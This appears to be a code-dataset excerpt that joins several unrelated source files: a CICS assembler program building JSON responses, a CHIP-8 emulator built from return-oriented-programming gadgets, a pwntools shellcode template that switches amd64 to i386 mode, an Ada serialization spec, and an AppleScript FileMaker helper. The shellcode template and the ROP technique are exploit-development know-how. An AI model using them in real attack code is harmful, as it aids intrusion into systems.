SET(R9) X FLENGTH(C_LENGTH) X INITIMG(HEX_00) X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Issue READ for FAxxKEY structure * *********************************************************************** FK_0010 DS 0H ST R14,BAS_REG Save return register MVC WK_FCT(08),SK_FCT Move KEY structure name MVC WK_TRAN,EIBTRNID Move KEY structure ID * CLC O_WITH,=C'UR' Uncommitted read request? BC B'1000',FK_00UR ... yes, issue READ w/o UPDATE BC B'0111',FK_00CR ... no, issue READ w/ UPDATE * *********************************************************************** * Uncommitted READ (WITH(UR)) * *********************************************************************** FK_00UR DS 0H EXEC CICS READ FILE(WK_FCT) X SET(R10) X RIDFLD (WK_KEY) X LENGTH (WK_LEN) X NOHANDLE BC B'1111',FK_0020 Continue process * *********************************************************************** * Committed READ (WITH(CR)) * *********************************************************************** FK_00CR DS 0H EXEC CICS READ FILE(WK_FCT) X SET(R10) X RIDFLD (WK_KEY) X LENGTH (WK_LEN) X UPDATE X NOHANDLE BC B'1111',FK_0020 Continue process * *********************************************************************** * Set FILE structure key fields and return * *********************************************************************** FK_0020 DS 0H USING DK_DSECT,R10 ... tell assembler * MVC WF_DD,DK_DD Move FILE structure name MVC WF_IDN,DK_F_IDN Move FILE IDN MVC WF_NC,DK_F_NC Move FILE NC * DROP R10 ... tell assembler * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Issue READ for FAxxFILE structure * * When the spanned segment number is equal to the WF_SEG, then the * * segment has already been read during spanned segment processing. * *********************************************************************** FF_0010 DS 0H ST R14,BAS_REG Save return register * CLC SS_SEG,WF_SEG Segment numbers equal? BC B'1000',FF_0020 ... yes, record is in the buffer * MVC WF_TRAN,EIBTRNID Move FILE structure ID * EXEC CICS READ FILE(WF_FCT) X SET(R10) X RIDFLD (WF_KEY) X LENGTH (WF_LEN) X NOHANDLE * USING DF_DSECT,R10 ... tell assembler * MVC W_SEG,DF_SEG Move segment number LH R1,DF_SEG Load segment number XR R6,R6 Clear R6 L R7,S_32K Load maximum segment size MR R6,R1 Create Column HI range ST R7,W_HI Save as segment HI range S R7,S_32K Subtract segment size A R7,=F'1' Add one to create segment LO ST R7,W_LO Save as segment LO range * FF_0020 DS 0H L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller DROP R10 ... tell assembler * *********************************************************************** * Transfer control to error logging program zFAM090 * *********************************************************************** PC_0010 DS 0H LA R1,E_LOG Load COMMAREA length STH R1,L_LOG Save COMMAREA length * EXEC CICS XCTL PROGRAM(ZFAM090) X COMMAREA(C_LOG) X LENGTH (L_LOG) X NOHANDLE * EXEC CICS WEB SEND X FROM (H_CRLF) X FROMLENGTH(H_TWO) X ACTION (H_ACTION) X MEDIATYPE (H_MEDIA) X STATUSCODE(H_500) X STATUSTEXT(H_500_T) X STATUSLEN (H_500_L) X SRVCONVERT X NOHANDLE * BC B'1111',RETURN Return (if XCTL fails) *********************************************************************** * Send response (WEB SEND) * *********************************************************************** WS_0010 DS 0H ST R14,BAS_REG Save return register L R4,RA_ADDR Load response array address USING RA_DSECT,R4 ... tell assembler * MVC WS_LEN,RA_LEN Set WEB SEND length * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',*+8 ... no, continue BAS R14,RJ_0060 ... yes, get RA length * EXEC CICS WEB WRITE X HTTPHEADER (H_ROWS) X NAMELENGTH (H_ROWS_L) X VALUE (M_ROWS) X VALUELENGTH(M_ROWS_L) X NOHANDLE * EXEC CICS WEB SEND X FROM (RA_DSECT) X FROMLENGTH(WS_LEN) X ACTION (H_ACTION) X MEDIATYPE (H_MEDIA) X STATUSCODE(H_200) X STATUSTEXT(H_200_T) X STATUSLEN (H_200_L) X SRVCONVERT X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON pre-key tags - begin. * *********************************************************************** RJ_0010 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer *********************************************************************** * Create Primary key JSON tag. * *********************************************************************** RJ_0013 DS 0H MVI 0(R4),C'{' Move JSON bracket MVI 1(R4),C'"' Move double quote LA R4,2(0,R4) Bump RA * LA R6,PI_NAME Load Primary name address LA R5,16 Load Primary name max length *********************************************************************** * Space marks end of Primary Key name * *********************************************************************** RJ_0014 DS 0H CLI 0(R6),C' ' End of Primary name? BC B'1000',RJ_0015 ... yes, mark JSON field end MVC 0(1,R4),0(R6) ... no, use to create JSON tag LA R4,1(,R4) Bump RA LA R6,1(,R6) Bump Primary name pointer BCT R5,RJ_0014 Continue moving Primary name *********************************************************************** * Mark end of Primary key JSON tag. When the field is 'character' * * set the double quotes before data is moved to the response array. * *********************************************************************** RJ_0015 DS 0H MVI 0(R4),C'"' Move double quote MVI 1(R4),C':' Move colon LA R4,2(,R4) Bump RA CLI PI_TYPE,C'N' Numeric field? BC B'1000',RJ_0019 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA *********************************************************************** * JSON pre-key tags - finish. * *********************************************************************** RJ_0019 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON post-key tags - begin. * * When processing character field, include the double quote. * *********************************************************************** RJ_0020 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer CLI O_P_TYPE,C'N' Numeric field? BC B'1000',RJ_0021 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA *********************************************************************** * The comma to separate JSON fields is moved before each data field * * is created. This insures that a trailing comma is not included in * * the response array. * *********************************************************************** RJ_0021 DS 0H *********************************************************************** * JSON post-key tags - finish. * *********************************************************************** RJ_0029 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON pre-field tags - begin. * * Include the comma, which separates each record in the array. * *********************************************************************** RJ_0030 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer MVI 0(R4),C',' Move a comma LA R4,1(0,R4) Bump RA *********************************************************************** * Create field JSON tag. * *********************************************************************** RJ_0031 DS 0H MVI 0(R4),C'"' Move double quote LA R4,1(0,R4) Bump RA * LA R6,P_NAME Load PA field name address LA R5,16 Load PA field name max length *********************************************************************** * Space marks end of field names * *********************************************************************** RJ_0032 DS 0H CLI 0(R6),C' ' End of field name? BC B'1000',RJ_0033 ... yes, mark JSON field end MVC 0(1,R4),0(R6) ... no, use to create JSON tag LA R4,1(,R4) Bump RA LA R6,1(,R6) Bump Primary name pointer BCT R5,RJ_0032 Continue moving field name *********************************************************************** * Mark end of field name JSON tag. When the field is 'character' * * set the double quotes before data is moved to the response array. * *********************************************************************** RJ_0033 DS 0H MVI 0(R4),C'"' Move double quote MVI 1(R4),C':' Move colon LA R4,2(,R4) Bump RA CLI P_TYPE,C'N' Numeric field? BC B'1000',RJ_0039 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA *********************************************************************** * JSON pre-field tags - finish. * *********************************************************************** RJ_0039 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON post-field tags - begin. * * When processing character field, include the double quote. * *********************************************************************** RJ_0040 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer CLI P_TYPE,C'N' Numeric field? BC B'1000',RJ_0041 ... yes, continue MVI 0(R4),C'"' ... no, move double quote LA R4,1(,R4) Bump RA *********************************************************************** * The comma to separate JSON fields is moved before each data field * * is created. This insures that a trailing comma is not included in * * the response array. * *********************************************************************** RJ_0041 DS 0H *********************************************************************** * JSON post-field tags - finish. * *********************************************************************** RJ_0049 DS 0H ST R4,RA_PTR Save RA pointer LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * JSON end of array indicator. * *********************************************************************** RJ_0050 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * L R4,RA_PTR Load response array pointer MVI 0(R4),C'}' Move JSON end of array marker LA R4,1(,R4) Bump RA ST R4,RA_PTR Save RA pointer * LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Set WEB SEND length by scanning Response Array until hitting a null * * character. The GETMAIN for the Response Array is calculated using * * the maximum field names of 16 bytes, however the actual field names * * can be from 1-16 bytes. * *********************************************************************** RJ_0060 DS 0H ST R14,RJ_REG Save return register * STM 0,15,REGSAVE Save all registers * XR R15,R15 Response Array counter L R6,RA_ADDR Load response array address L R5,RA_LEN Load response array length *********************************************************************** * Search Response Array for null character * *********************************************************************** RJ_0061 DS 0H CLI 0(R6),X'00' Null character? BC B'1000',RJ_0062 ... yes, set WEB SEND length LA R15,1(0,R15) Add 1 to RA counter LA R6,1(,R6) Bump RA pointer BCT R5,RJ_0061 Continue searching for null *********************************************************************** * Set WEB SEND length using R15 counter. * *********************************************************************** RJ_0062 DS 0H ST R15,WS_LEN Save WEB SEND length * LM 0,15,REGSAVE Load all registers L R14,RJ_REG Load return register BCR B'1111',R14 Return to caller * * *********************************************************************** * Issue TRACE command. * *********************************************************************** TR_0010 DS 0H ST R14,BAS_REG Save return register STM 0,15,REGSAVE Save registers * * BC B'1111',TR_0020 Bypass trace * EXEC CICS ENTER TRACENUM(T_46) X FROM(W_46_M) X FROMLENGTH(T_LEN) X RESOURCE(T_RES) X NOHANDLE * TR_0020 DS 0H LM 0,15,REGSAVE Load registers L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * STATUS(204) * *********************************************************************** ER_20401 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'01' Set REASON BC B'1111',PC_0010 Transfer control to logging *********************************************************************** * STATUS(204) * *********************************************************************** ER_20402 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'02' Set REASON BC B'1111',PC_0010 Transfer control to logging *********************************************************************** * STATUS(204) * *********************************************************************** ER_20403 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'03' Set REASON BC B'1111',PC_0010 Transfer control to logging *********************************************************************** * STATUS(204) * *********************************************************************** ER_20404 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'04' Set REASON BC B'1111',PC_0010 Transfer control to logging *********************************************************************** * STATUS(204) * *********************************************************************** ER_20405 DS 0H MVC C_STATUS,S_204 Set STATUS MVC C_REASON,=C'05' Set REASON BC B'1111',PC_0010 Transfer control to logging *********************************************************************** * STATUS(400) * *********************************************************************** ER_40001 DS 0H MVC C_STATUS,S_400 Set STATUS MVC C_REASON,=C'01' Set REASON BC B'1111',PC_0010 Transfer control to logging * *********************************************************************** * Define Constant fields * *********************************************************************** * DS 0F HEX_00 DC XL01'00' Nulls DS 0F HEX_40 DC 16XL01'40' Spaces DS 0F S_204 DC CL03'204' HTTP STATUS(204) DS 0F S_400 DC CL03'400' HTTP STATUS(400) DS 0F ONE DC F'1' One S_OT_LEN DC F'80' OPTIONS table maximum length S_PA_LEN DC F'8192' Parser Array maximum length S_FD_LEN DC F'65000' Field Define maximum length S_RA_LEN DC F'3200000' Response Array maximum length DS 0F S_DF_LEN DC H'32700' FAxxFILE maximum length DS 0F S_32K DC F'32000' Maximum segment length DS 0F PD_ZERO DC XL02'000F' Packed decimal zeroes PD_ONE DC XL02'001F' Packed decimal zeroes PD_NINES DC XL02'999F' Packed decimal nines ZD_ONE DC CL04'0001' Zoned decimal 0001 DS 0F ZFAM090 DC CL08'ZFAM090 ' zFAM Loggin and error program SK_FCT DC CL08'FAxxKEY ' zFAM KEY structure SF_FCT DC CL08'FAxxFILE' zFAM FILE structure C_CHAN DC CL16'ZFAM-CHANNEL ' zFAM channel C_OPTION DC CL16'ZFAM-OPTIONS ' OPTIONS container C_TTL DC CL16'ZFAM-TTL ' TTL container C_ARRAY DC CL16'ZFAM-ARRAY ' ARRAY container DS 0F S_FIXED DC CL09'FIXED ' Format FIXED DS 0F S_XML DC CL09'XML ' Format XML DS 0F S_JSON DC CL09'JSON ' Format JSON DS 0F S_DELIM DC CL09'DELIMITER' Format DELIMITER DS 0F *********************************************************************** * HTTP resources * *********************************************************************** H_TWO DC F'2' Length of CRLF H_CRLF DC XL02'0D25' Carriage Return Line Feed H_500 DC H'500' HTTP STATUS(500) H_500_L DC F'48' HTTP STATUS TEXT Length H_500_T DC CL16'03 Service unava' HTTP STATUS TEXT Length DC CL16'ilable and loggi' ... continued DC CL16'ng disabled ' ... and complete DS 0F H_200 DC H'200' HTTP STATUS(200) H_200_L DC F'32' HTTP STATUS TEXT Length H_200_T DC CL16'00 Request succe' HTTP STATUS TEXT Length DC CL16'ssful. ' ... continued DS 0F H_ACTION DC F'02' HTTP SEND ACTION(IMMEDIATE) H_MEDIA DC CL56'text/plain' HTTP Media type DS 0F M_ROWS_L DC F'04' HTTP Header message length M_ROWS DC CL04'0001' HTTP Header message H_ROWS_L DC F'09' HTTP Header length H_ROWS DC CL09'zFAM-Rows' HTTP Header DS 0F *********************************************************************** * Trace resources * *********************************************************************** T_46 DC H'46' Trace number T_46_M DC CL08'Build RA' Trace message T_RES DC CL08'zFAM020 ' Trace resource T_LEN DC H'08' Trace resource length * *********************************************************************** * Media type resources * *********************************************************************** DS 0H M_PLAIN DC CL10'TEXT/PLAIN' Equates to FORMAT=FIXED M_JSON DC CL09'TEXT/JSON' Equates to FORMAT=JSON M_XML DC CL08'TEXT/XML' Equates to FORMAT=XML M_DELIM DC CL14'TEXT/DELIMITED' Equates to FORMAT=DELIMITED DS 0H A_JSON DC CL16'APPLICATION/JSON' Equates to FORMAT=JSON A_XML DC CL15'APPLICATION/XML' Equates to FORMAT=XML *********************************************************************** * JSON characters. * *********************************************************************** DS 0H T_JSON DC XL01'BB' JSON trailer T_JSON_L EQU *-T_JSON JSON trailer length DS 0H H_XML DC CL16'<zFAM_ResultsArr' XML header DC CL03'ay>' H_XML_L EQU *-H_XML XML header length DS 0H T_XML DC CL16'</zFAM_ResultsAr' XML trailer DC CL04'ray>' T_XML_L EQU *-T_XML XML trailer length DS 0H L_SQUIG DC CL01'{' Left squiggle bracket R_SQUIG DC CL01'}' Right squiggle bracket L_SQUARE DC XL01'BA' Left square bracket R_SQUARE DC XL01'BB' Right square bracket A_COMMA DC CL01',' A comma D_QUOTE DC CL01'"' Double quote * *********************************************************************** * Literal Pool * *********************************************************************** LTORG * * *********************************************************************** * Register assignment * *********************************************************************** DS 0F R0 EQU 0 R1 EQU 1 R2 EQU 2 R3 EQU 3 R4 EQU 4 R5 EQU 5 R6 EQU 6 R7 EQU 7 R8 EQU 8 R9 EQU 9 R10 EQU 10 R11 EQU 11 R12 EQU 12 R13 EQU 13 R14 EQU 14 R15 EQU 15 * PRINT ON *********************************************************************** * End of Program - ZFAM020 * ********************************************************************** END ZFAM020

opcodes.asm

DavidBuchanan314/CHIP8-ROP

1

11725

BITS 64 extern puts extern exit extern vram extern V extern DT global emu_entry global op_debug global op_nop global op_ret global op_jp global op_call global op_se_imm global op_sne_imm global op_se global op_ld_imm global op_add_imm global op_ld global op_or global op_and global op_xor global op_add global op_ld_i global op_drw global op_unld_dt global op_ld_dt global op_add_i global op_ld_regs section .data section .bss stack: resq 16 section .text align 4 emu_entry: add rsp, 8 xor rdi, rdi; I register xor r11, r11; SP register ret align 4 op_debug: ; not a real op, used for debugging pop rdi call puts mov rdi, -1 call exit align 4 op_nop: ; also not a real op add rsp, 8 ret align 4 op_ret: dec r11 mov rsp, [stack+r11*8] ret align 4 op_jp: pop rsp ret align 4 op_call: pop rax mov [stack+r11*8], rsp inc r11 mov rsp, rax ret align 4 op_se_imm: pop rax movzx ecx, ah cmp [V+ecx], al jne .cont add rsp, 16 .cont ret align 4 op_sne_imm: pop rax movzx ecx, ah cmp [V+ecx], al je .cont add rsp, 16 .cont ret align 4 op_se: pop rax xor rbx, rbx mov bl, ah mov cl, [V+rbx] mov bl, al mov al, [V+rbx] cmp cl, al jne .cont add rsp, 16 .cont ret align 4 op_ld_imm: pop rax movzx ecx, ah mov [V+ecx], al ret align 4 op_add_imm: pop rax movzx ecx, ah add [V+ecx], al ret align 4 op_or: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah or [V+ecx], al ret align 4 op_and: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah and [V+ecx], al ret align 4 op_xor: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah xor [V+ecx], al ret align 4 op_add: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah add [V+ecx], al ret align 4 op_ld: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah mov [V+ecx], al ret align 4 op_ld_i: pop rdi ret align 4 op_drw: pop rax movzx ecx, ah mov cl, [V+ecx] add cl, 8 mov dl, al xor rbx, rbx mov bl, al shr bl, 4 mov bl, [V+rbx] mov byte [V+0xF], 0 mov rsi, rdi .loop and dl, 0xF jz .done and rbx, 31 xor rax, rax mov al, [rsi] ror rax, cl mov r8, rax and r8, [vram+rbx*8] jz .nocol mov byte [V+0xF], 1 .nocol xor [vram+rbx*8], rax inc rbx inc rsi dec dl jmp .loop .done ret align 4 op_unld_dt: pop rax mov dl, [DT] mov [rax], dl ret align 4 op_ld_dt: pop rax mov al, [rax] mov [DT], al ret align 4 op_add_i: pop rax xor rbx, rbx mov bl, byte [rax] add rdi, rbx ret align 4 op_ld_regs: pop rax .loop mov bl, [rdi+rax] mov [V+rax], bl dec rax jns .loop ret

pwnlib/shellcraft/templates/amd64/linux/amd64_to_i386.asm

tkmikan/pwntools

8,966

161288

<% from pwnlib.shellcraft import common %> <%docstring>Returns code to switch from amd64 to i386 mode. Note that you most surely want to set up some stack (and place this code) in low address space before (or afterwards).</%docstring> .code64 call $+4 .byte 0xc0 /* inc eax */ mov byte ptr [rsp+4], 0x23 /* This is the segment we want to go to */ retfd .code32

source/serialization.ads

ytomino/yaml-ada

4

7055

<reponame>ytomino/yaml-ada with Ada.Containers; with Ada.Iterator_Interfaces; with Ada.Strings.Unbounded; package Serialization is pragma Preelaborate; type Stream_Element_Kind is ( Value, Enter_Mapping, Leave_Mapping, Enter_Sequence, Leave_Sequence, End_Of_Stream); type Direction is (Reading, Writing); type Serializer (Direction : Serialization.Direction) is limited private; -- scalar procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Ada.Strings.Unbounded.Unbounded_String); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Ada.Strings.Unbounded.Unbounded_String; Default : in Ada.Strings.Unbounded.Unbounded_String); procedure IO ( Object : not null access Serializer; Value : in out Ada.Strings.Unbounded.Unbounded_String); procedure IO ( Object : not null access Serializer; Value : in out Ada.Strings.Unbounded.Unbounded_String; Default : in Ada.Strings.Unbounded.Unbounded_String); generic type Custom_Type is private; with function Image (S : Custom_Type) return String; with function Value (S : String) return Custom_Type; Triming : in Boolean := False; package IO_Custom is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Custom_Type); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Custom_Type; Default : in Custom_Type); end IO_Custom; generic type Enumeration_Type is (<>); package IO_Enumeration is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type; Default : in Enumeration_Type); private package Enum_IO is new IO_Custom ( Enumeration_Type, Enumeration_Type'Image, Enumeration_Type'Value, Triming => True); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type) renames Enum_IO.IO; procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type; Default : in Enumeration_Type) renames Enum_IO.IO; end IO_Enumeration; procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Integer); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Integer; Default : in Integer); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Boolean); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Boolean; Default : in Boolean); -- mapping procedure IO ( Object : not null access Serializer; Name : in String; Callback : not null access procedure); procedure IO ( Object : not null access Serializer; Callback : not null access procedure); type Cursor is private; function Has_Element (Position : Cursor) return Boolean; package Mapping_Iterator_Interfaces is new Ada.Iterator_Interfaces (Cursor, Has_Element); function IO (Object : not null access Serializer; Name : String) return Mapping_Iterator_Interfaces.Forward_Iterator'Class; function IO (Object : not null access Serializer) return Mapping_Iterator_Interfaces.Forward_Iterator'Class; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; Default : in Element_Type; with procedure Iterate ( Container : in Container_Type; Process : not null access procedure (Position : in Cursor)) is <>; with procedure Update_Element ( Container : in out Container_Type; Position : in Cursor; Process : not null access procedure ( Key : in String; Element : in out Element_Type)) is <>; with procedure Insert ( Container : in out Container_Type; Key : in String; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Map_2005 is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); end IO_Map_2005; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; type Reference_Type ( Element : not null access Element_Type) is limited private; Default : in Element_Type; with function Has_Element (Position : Cursor) return Boolean is <>; with function First (Container : Container_Type) return Cursor is <>; with function Next (Position : Cursor) return Cursor is <>; with function Key (Position : Cursor) return String is <>; with function Reference ( Container : aliased in out Container_Type; Position : Cursor) return Reference_Type is <>; with procedure Insert ( Container : in out Container_Type; Key : in String; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Map_2012 is procedure IO ( Object : not null access Serializer; Name : in String; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); end IO_Map_2012; generic package IO_Map renames IO_Map_2012; -- sequence generic type Index_Type is (<>); type Element_Type is private; type Array_Type is array (Index_Type range <>) of Element_Type; type Array_Access is access Array_Type; Default : in Element_Type; with procedure Free (X : in out Array_Access) is <>; package IO_Array is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Array_Access; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Array_Access; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_Array; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; Default : in Element_Type; with function Last (Container : Container_Type) return Cursor is <>; with procedure Iterate ( Container : in Container_Type; Process : not null access procedure (Position : in Cursor)) is <>; with procedure Update_Element ( Container : in out Container_Type; Position : in Cursor; Process : not null access procedure (Element : in out Element_Type)) is <>; with procedure Append ( Container : in out Container_Type; New_Item : in Element_Type; Count : in Ada.Containers.Count_Type := 1) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_List_2005 is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_List_2005; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; type Reference_Type ( Element : not null access Element_Type) is limited private; Default : in Element_Type; with function Last (Container : Container_Type) return Cursor is <>; with function Has_Element (Position : Cursor) return Boolean is <>; with function First (Container : Container_Type) return Cursor is <>; with function Next (Position : Cursor) return Cursor is <>; with function Reference ( Container : aliased in out Container_Type; Position : Cursor) return Reference_Type is <>; with procedure Append ( Container : in out Container_Type; New_Item : in Element_Type; Count : in Ada.Containers.Count_Type := 1) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_List_2012 is procedure IO ( Object : not null access Serializer; Name : in String; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_List_2012; generic package IO_List renames IO_List_2012; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; Default : in Element_Type; with procedure Iterate ( Container : in Container_Type; Process : not null access procedure (Position : in Cursor)) is <>; with procedure Query_Element ( Position : in Cursor; Process : not null access procedure (Element : in Element_Type)) is <>; with procedure Insert ( Container : in out Container_Type; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Set_2005 is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_Set_2005; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; type Constant_Reference_Type ( Element : not null access constant Element_Type) is limited private; Default : in Element_Type; with function Has_Element (Position : Cursor) return Boolean is <>; with function First (Container : Container_Type) return Cursor is <>; with function Next (Position : Cursor) return Cursor is <>; with function Constant_Reference ( Container : aliased Container_Type; Position : Cursor) return Constant_Reference_Type is <>; with procedure Insert ( Container : in out Container_Type; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Set_2012 is procedure IO ( Object : not null access Serializer; Name : in String; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_Set_2012; generic package IO_Set renames IO_Set_2012; private type State is (In_Mapping, In_Sequence); pragma Discard_Names (State); type Reader is abstract tagged limited null record; function Next_Kind (Object : not null access Reader) return Stream_Element_Kind is abstract; function Next_Name (Object : not null access Reader) return not null access constant String is abstract; function Next_Value (Object : not null access Reader) return not null access constant String is abstract; procedure Advance ( Object : not null access Reader; Position : in State) is abstract; procedure Advance_Structure ( Object : not null access Reader; Position : in State); type Writer is abstract tagged limited null record; procedure Put ( Object : not null access Writer; Name : in String; Item : in String) is abstract; procedure Enter_Mapping ( Object : not null access Writer; Name : in String) is abstract; procedure Leave_Mapping (Object : not null access Writer) is abstract; procedure Enter_Sequence ( Object : not null access Writer; Name : in String) is abstract; procedure Leave_Sequence (Object : not null access Writer) is abstract; type Serializer (Direction : Serialization.Direction) is limited record case Direction is when Reading => Reader : not null access Serialization.Reader'Class; when Writing => Writer : not null access Serialization.Writer'Class; end case; end record; -- mapping type Cursor is new Boolean; type Mapping_Iterator is new Mapping_Iterator_Interfaces.Forward_Iterator with record Serializer : not null access Serialization.Serializer; Entry_Presence : Boolean; end record; overriding function First (Object : Mapping_Iterator) return Cursor; overriding function Next (Object : Mapping_Iterator; Position : Cursor) return Cursor; end Serialization;

library/fmGUI_ManageDatabase/fmGUI_ManageDb_FieldsPickTable.applescript

NYHTC/applescript-fm-helper

1

3790

-- fmGUI_ManageDb_FieldsPickTable(baseTableName) -- <NAME>, NYHTC -- select the specified ( if not already selected ) base table on the Fields tab of Manage Database. (* HISTORY: 1.4.1 - 2017-09-06 ( eshagdar ): updated error message. updated call to pop up set. 1.4 - 2016-10-28 ( eshagdar ): ensure app is frontmost 1.3 - 1.2 - 1.1 - 1.0 - created REQUIRES: fmGUI_AppFrontMost fmGUI_ManageDb_GoToTab_Fields fmGUI_PopupSet *) on run fmGUI_ManageDb_FieldsPickTable("ZZ_GLOBALS") end run -------------------- -- START OF CODE -------------------- on fmGUI_ManageDb_FieldsPickTable(baseTableName) -- version 1.4.1 try fmGUI_AppFrontMost() fmGUI_ManageDb_GoToTab_Fields({}) tell application "System Events" tell application process "FileMaker Pro Advanced" set tablePopUpButton to pop up button "Table:" of tab group 1 of window 1 end tell end tell fmGUI_PopupSet({objRef:tablePopUpButton, objValue:baseTableName}) return true on error errMsg number errNum error "unable to fmGUI_ManageDb_FieldsPickTable ( couldn't select table '" & baseTableName & "' ) - " & errMsg number errNum end try end fmGUI_ManageDb_FieldsPickTable -------------------- -- END OF CODE -------------------- on fmGUI_AppFrontMost() tell application "htcLib" to fmGUI_AppFrontMost() end fmGUI_AppFrontMost on fmGUI_ManageDb_GoToTab_Fields(prefs) tell application "htcLib" to fmGUI_ManageDb_GoToTab_Fields(prefs) end fmGUI_ManageDb_GoToTab_Fields on fmGUI_PopupSet(prefs) set objRefStr to coerceToString(objRef of prefs) tell application "htcLib" to fmGUI_PopupSet({objRef:objRefStr} & prefs) end fmGUI_PopupSet on coerceToString(incomingObject) -- 2017-07-12 ( eshagdar ): bootstrap code to bring a coerceToString into this file for the sample to run ( instead of having a copy of the handler locally ). tell application "Finder" to set coercePath to (container of (container of (path to me)) as text) & "text parsing:coerceToString.applescript" set codeCoerce to read file coercePath as text tell application "htcLib" to set codeCoerce to "script codeCoerce " & return & getTextBetween({sourceTEXT:codeCoerce, beforeText:"-- START OF CODE", afterText:"-- END OF CODE"}) & return & "end script" & return & "return codeCoerce" set codeCoerce to run script codeCoerce tell codeCoerce to coerceToString(incomingObject) end coerceToString

